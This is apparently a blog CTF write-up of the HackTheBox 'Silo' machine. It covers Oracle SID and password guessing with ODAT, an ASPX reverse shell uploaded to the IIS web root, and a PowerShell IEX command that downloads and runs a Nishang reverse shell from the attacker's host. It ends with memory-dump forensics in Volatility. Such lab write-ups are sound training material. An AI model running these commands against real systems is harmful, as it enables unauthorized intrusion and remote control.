Post

HackTheBox_Silo w/o Metasploit

Posted Updated
By Muqaram Majid
1 min read

HTB - Silo

Overview

Image

Enumeration

Nmap Scan Results

Image
Image

Vulnerabilities and Exploitation

Download ODAT

ODAT GitHub Repository

Image

Clone the repository and run the odat.py file:

Image
Image
Image
Image

Fix installation issues:

1
2
3
4
5

pip3 uninstall crypto
pip3 uninstall pycrypto
pip3 install pycryptodome

Image

Guess SID

Use ODAT to guess the SID:

1

python3 [odat.py](http://odat.py/) sidguesser -s 10.10.10.82 -p 1521

Image

Nmap Script for SID

Use an nmap script to find the SID:

Image

The SID is XE.

Check password guessing options:

Image
Image

Update the wordlist to include uppercase characters:

Image
Image
Image

Format the wordlist properly:

Image

Password Guessing

Guess the password using the updated list:

Image

Valid credentials: scott/tiger

Use the credentials to access:

1

sqlplus64 scott/tiger@10.10.10.82:1521/XE

Image
Image
Image

Privilege Escalation

Check user privileges:

Image

Use ODAT to upload a reverse shell:

1

python3 [odat.py](http://odat.py/) utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --putFile C:\\inetpub\\wwwroot muq.aspx muq.aspx --sysdba

Image
Image

Visit the page to access the reverse shell:

Image

Nishang Shell

Download the Nishang shell:

Nishang GitHub Repository

Add the following line to invoke the shell:

1

tail -1 Invoke-PowerShellTcp.ps1

Image
Image
Image

Triggering the Webshell

Use the webshell to download and execute the Nishang shell:

1

powershell IEX(New-Object Net.WebClient).downloadString('[http://10.10.14.31:8000/nish.ps1](http://10.10.14.31:8000/nish.ps1)')

Image

User Flag

Getting ourselves the user flag

Image
Image

Check if there are issues with the password character display:

Image
Image

Memory Dump Analysis

Get the OS version and clone Volatility:

Image

Clone Volatility:

1
2
3

git clone https://github.com/volatilityfoundation/volatility.git
cd volatility
python2 setup.py install

Analyze the memory dump with Volatility:

1

python2 [vol.py](http://vol.py/) -f ~/Downloads/SILO-20180105-221806.dmp imageinfo

Check processes in the memory dump:

Image

Use the WIN2012 profile to check the process tree:

1

python2 [vol.py](http://vol.py/) -f ~/Downloads/SILO-20180105-221806.dmp --profile Win2012R2x64 pstree

Image
Image

Dump files from memory:

1

python2 [vol.py](http://vol.py/) -f ~/Downloads/SILO-20180105-221806.dmp --profile Win2012R2x64 dumpfiles -Q 0x12345678 -D /tmp/

Analyze extracted files:

1

strings /tmp/extracted_file > strings.txt

Root Flag

Image
Image

hackthebox, CTF, writeups
ctf hackthebox writeup windows medium
This post is licensed under CC BY 4.0 by the author.

Comments powered by Disqus.